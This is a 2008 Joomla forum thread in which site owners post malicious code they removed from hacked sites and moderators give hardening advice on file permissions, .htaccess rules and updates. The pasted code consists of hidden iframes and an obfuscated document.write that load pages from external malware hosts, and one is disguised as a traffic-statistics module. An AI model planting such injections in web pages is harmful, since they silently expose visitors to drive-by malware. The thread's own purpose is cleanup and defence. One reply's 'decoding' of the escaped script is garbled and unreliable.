Joomla site was hacked

Discussion regarding Joomla! security issues.

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
User avatar
psg
Joomla! Apprentice
Joomla! Apprentice
Posts: 11
Joined: Wed May 21, 2008 11:02 am
Location: Brighton, U.K

Joomla site was hacked

Post by psg » Thu Jul 03, 2008 12:32 pm

Hey,
I am a novice web-master and run a website http://www.ethnicracialstudies.net
for a friend using Joomla! 1.0.12 Stable / PHP 4.4.8-1 /

This morning I saw that the site was being blocked by Google with a red page saying this site may harm you.

So i searched inside the /stories folder and found two PHP files and a back door trojan which I deleted. But the site kept trying to download 'packed JS agent.js' and trying to go to different sites.

I then downloaded my index.php and found that lines had been added at the end.(see below)

I removed it and uploaded the index.php and checked that it did not react any more like it did before. I am still waiting for Google to give my site an OK status and remove the line (This site may be harmful). :)

Hope this helps.
I don't know how they managed to get in though, I would really like to know what i should do to stop them

Cheers
PSG


CODE LINES I REMOVED BELOW:
doGzip();

?>

<iframe src="http://Contact.com.az/upload/photos/index.php"
style="display:none"></iframe>

<iframe src="http://avwav.com/3230.htm" style="display:none"></iframe>

<iframe src="http://sum4count.net/strong/023/" style="display:none"></
iframe><iframe src="http://fayhvkfnvu.com/dl/adv670.php"
style="display:none"></iframe><iframe src="http://fayhvkfnvu.com/dl/ adv670.php" style="display:none"></iframe><script type="text/ javascript">

document.write('\u003c\u0069\u0066\u0072\u0061\u006d
\u0065\u0020\u0073\u0072\u0063\u003d
\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006c\u006f
\u0067\u002e\u0074\u0072\u0061\u0066\u0066\u006d
\u0061\u0073\u0074\u0065\u0072\u002e\u006e\u0065\u0074\u002f\u006f
\u0075\u0074\u002e
\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d
\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d
\u0022\u0030\u0022\u0020\u0066\u0072\u0061\u006d\u0065\u0062\u006f
\u0072\u0064\u0065\u0072\u003d\u0022\u0030\u0022\u003e\u003c\u002f
\u0069\u0066\u0072\u0061\u006d\u0065\u003e');

</script><iframe src="http://sum4count.net/strong/023/"
style="display:none"></iframe>
<iframe src="http://sum4count.net/strong/023/" style="display:none"></
iframe>

User avatar
twcmex
Joomla! Guru
Joomla! Guru
Posts: 551
Joined: Sat Dec 16, 2006 10:35 pm
Location: Durango, Mexico

Re: Joomla site was hacked

Post by twcmex » Thu Jul 03, 2008 1:51 pm

I don't know how they managed to get in though, I would really like to know what i should do to stop them
Have you reviewed the Security Checklist ?- (red header at top of this page)
-Joe

vscribe
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 207
Joined: Thu Jun 01, 2006 3:16 pm
Location: Texas, USA
Contact:

Re: Joomla site was hacked

Post by vscribe » Thu Jul 03, 2008 4:38 pm

The /hex decodes to this: <far=tp/l.rfmatrntou.ppit=""hih="faeore=0>/irm>

You might have a root kit, but more than likely its riddled with a trojan in the .html or somewhere in a .php file.
cmsconnection.com/forum - the multi-cms forum

countryboy
Joomla! Apprentice
Joomla! Apprentice
Posts: 45
Joined: Thu May 11, 2006 10:34 pm

Re: Joomla site was hacked with IFRAME

Post by countryboy » Fri Jul 11, 2008 7:22 am

I have been trying to fix an older Joomla (I know...will upgrade from the 1.0.11). The site was hacked by placing an iframe in a module. See info below. I am a deleting the module after researching. I am not sure how the culprit got in and really don't know how to find out other than pouring over log files from who knows when.

Google also flagged the site. Now the effort is going to be to remove the Google flag. Often wonder if this is not some kind of virus too. They send you a message saying it was flagged, but give you know indication why or where.

I am just supply this to others so they might be able to check the same place. I am looking through all files to find anything related. If anyone has any ideas or suggestions where else to look please advise. I am not sure what the module suffix leads to.

Here is what I found in the modules:

A module was created named:

Published in the left module location
Title Mambo Info

The module has this code in the HTML



Disabling the module gets rid of the "This site wants to run addon -Remote Data Services Data Control from Microsoft.com. If ou trust the wetsite and addon and want to allow control....

Mambo Info Module
Show Title = No
Module Oreder 1 Mambo Info
Access Level = Public
Published was Yes...changed to NO on 7/10/11:30 pm PST

Description Custom Module
Module Class Suffix = vvbbnn33
Module Cache = No
Mambots = Yes
RSS URL nothing
Feed Title = Yes
Feed Description = Yes
Feed Image= Yes
Items = 3
Item Description = yes
Word Count = 0
RSS Cache time = 3600

Content:
<!-- Traffic Statistics -->
<iframe src="http://61.155.8.157/iframe/wp-stats.php" frameborder="0" width="1" height="1"></iframe><!-- End Traffic Statistics
Pages Menu Items = All reset to none

User avatar
psg
Joomla! Apprentice
Joomla! Apprentice
Posts: 11
Joined: Wed May 21, 2008 11:02 am
Location: Brighton, U.K

Re: <SOLVED> Joomla site was hacked

Post by psg » Fri Jul 11, 2008 9:01 am

Google unflagged me the next day. i had written to them and asked them to reverify the site through the Google websmaster tools. I had also written to Stop badware.

Cheers
8)

countryboy
Joomla! Apprentice
Joomla! Apprentice
Posts: 45
Joined: Thu May 11, 2006 10:34 pm

Re: Joomla site was hacked

Post by countryboy » Fri Jul 11, 2008 3:19 pm

Thank you. I was hoping they had some way of rectifying things quickly if they are going to post them.

User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2734
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: Joomla site was hacked

Post by PhilD » Fri Jul 11, 2008 6:29 pm

The php files were added to the stories directory due to permission levels being set to high. If permission levels are set to 777 then it is easy for someone to upload something to the directory and execute it. Likely the index.php file also has the permission of 777 allowing it to be modified.

Permission settings should always be 644 for files and 755 for directories for all of a Joomla install. If 755 causes problems with people trying to upload photos to go with stories, then that directory can be set to 777 and an .htaccess file with code to prevent execution of scripts from that directory can be added. You can change 644 to higher on a temporary basis to make edits to a file, but change the permissions back to 644 when done. You can also change certain directories to 777 on a temp basis to install, or remove an extension. Change back to 755 on these directories when done.

In directories such as images, media, cache, you can place an .htaccess file in them. This prevents listing directory contents and executing scripts from them. The .htaccess file in each of those directories should contain the following code.

Code: Select all

        # Don't list contents, that would be bad :D
        IndexIgnore *
        Options All -Indexes
        # Secure directory by disabling script execution
        AddHandler cgi-script .php .php2 .php3 .php4 .php5 .php6 .php7 .php8 .pl .py .jsp .asp .htm .html .shtml .sh .cgi
        Options -ExecCGI
        # Don't show this file, that would be bad as well!
        <Files .htaccess>
        order allow,deny
        deny from all
        </Files>
This .htaccess file does not prevent someone from uploading a bad script but it will prevent them from executing it.

Also enable the htaccess.txt file that comes with Joomla by renaming it to .htaccess It is in where you installed Joomla (Joomla root). Do this even if you don't use search friendly urls as the file contains code to prevent common exploits.
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

cantthinkofanickname
Joomla! Ace
Joomla! Ace
Posts: 1334
Joined: Sat Oct 21, 2006 8:53 am

Re: Joomla site was hacked

Post by cantthinkofanickname » Fri Jul 11, 2008 6:51 pm

I have just browsed through my site folders for other than 755/644.Is there a quicker way of overseeing all the permissions?
Thanks for your time.

User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2734
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: Joomla site was hacked

Post by PhilD » Fri Jul 11, 2008 7:08 pm

You can issue chmod commands from a shell prompt if you have shell access or you can ask your hosting service to chmod all files on your account public_html directory to 644 and all directories to 755. You can also ask them to chown the ownership of all these files/ directories to be owned by your account.
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

Tahitiblue
Joomla! Apprentice
Joomla! Apprentice
Posts: 9
Joined: Fri Jul 11, 2008 11:46 pm

Re: Joomla site was hacked

Post by Tahitiblue » Fri Jul 11, 2008 11:52 pm

countryboy,
I just got hit with the same "Mambo Info" module that you did, since It looks like this something new, and not related to the other posts in this thread, I'm going to try to start a new thread on this specific threat.

Tahiti Blue.

countryboy
Joomla! Apprentice
Joomla! Apprentice
Posts: 45
Joined: Thu May 11, 2006 10:34 pm

Re: Joomla site was hacked

Post by countryboy » Sat Jul 12, 2008 12:28 am

Good idea! If you figure out anything about how they got in please post it. I will too...but still struggling to find out where. I have site down now and am doing a complete upgrade, but if this is new then there might be another fix to contend with. Thanks.

User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2734
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: Joomla site was hacked

Post by PhilD » Sat Jul 12, 2008 4:45 pm

How someone can "get in" to your site. This applies to any CMS systems, forums, galleries, etc. and even general static html sites. It is not an exhaustive list by any means, but does contain many very common ways of getting in.

Set all files and directories to 777 or just set one file or directory to 777.
Do not rename and use the htaccess.txt file that comes with Joomla.
If forced to set a directory such as the images directory to 777 because of a poor server setup, do not protect it with it's very own .htaccess file with code shown above.
Do not upgrade Joomla to the latest version.
Set your configuration.php file set to 777 so it is easier to edit.
Install all kinds of extensions even if not using them.
Install all kinds of templates that you don't use
Set and leave the template files to 777 so it is easier to edit them on a whim
Don't check the extension vulnerability list to see if any extensions you have are on the list.
Don't keep the extensions you have installed updated to their latest versions.
Use the same really easy password for everything because it is easier to remember just one password.
Never look at the raw logs of your account.
Put your session directory inside of public_html and make it 777

What to do about above. This applies to any CMS systems, forums, galleries, etc. and even general static html sites. It is not an exhaustive list by any means, but does contain many very common ways of keeping bad people from getting in. If you are not following these guidelines and the other guidelines posted in stickies and the Joomla help site, your site will be exploited.

Set all files in the public_html directory to 644
Set all directories inside the public_html directory to 755
Enable the htaccess.txt file that came with Joomla by renaming to .htaccess The file WILL NOT WORK if you do not rename it no matter what you put in it.
If forced to set a directory such as the images directory to 777 because of a poor server setup, then protect it with it's very own .htaccess file that contains the code provided in a post above.
Even if not forced to set a directory to 777 you can still give a directory it's very own .htaccess file as long as there are no files that actually need executing in the directory.
Aways make sure that your CMS system is updated to the latest version.
Always make sure any extensions you have (active or not) are up to date.
Do not use an extension version if it is on a list of extensions with security holes.
Never leave any directories or files set to 777 that you don't absolutely have to leve set at that level.
Never allow the arbitrary listing of contents in a directory from the web.
Always check your raw logs for suspicious activity.
Always use very strong passwords consisting of letters (upper, lower), numbers, and symbols
Always use a different password for each thing that requires a password. Use a password manager such as KeePass password safe to keep up with and manage the passwords.
Change ALL the passwords on a regular basis., including database, ftp, account and email passwords.
Uninstall and Remove traces (the directory and files they sometimes leave) of any unused extensions.
Uninstall and Remove traces (the directory and files they sometimes leave) of any unused templates.
Don't install any unnecessary extensions. You want to try an extension? Install it on your local test server.
Don't install any unnecessary templates.
Don't remove security code from core files (any files really) just because you read it on Google. The code is there for a purpose.
Use a hosting service that keeps the server software up to date and knows how to properly configure a server. Remember, like everything else, some just want your money.
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator


Locked

Return to “Security - 1.0.x”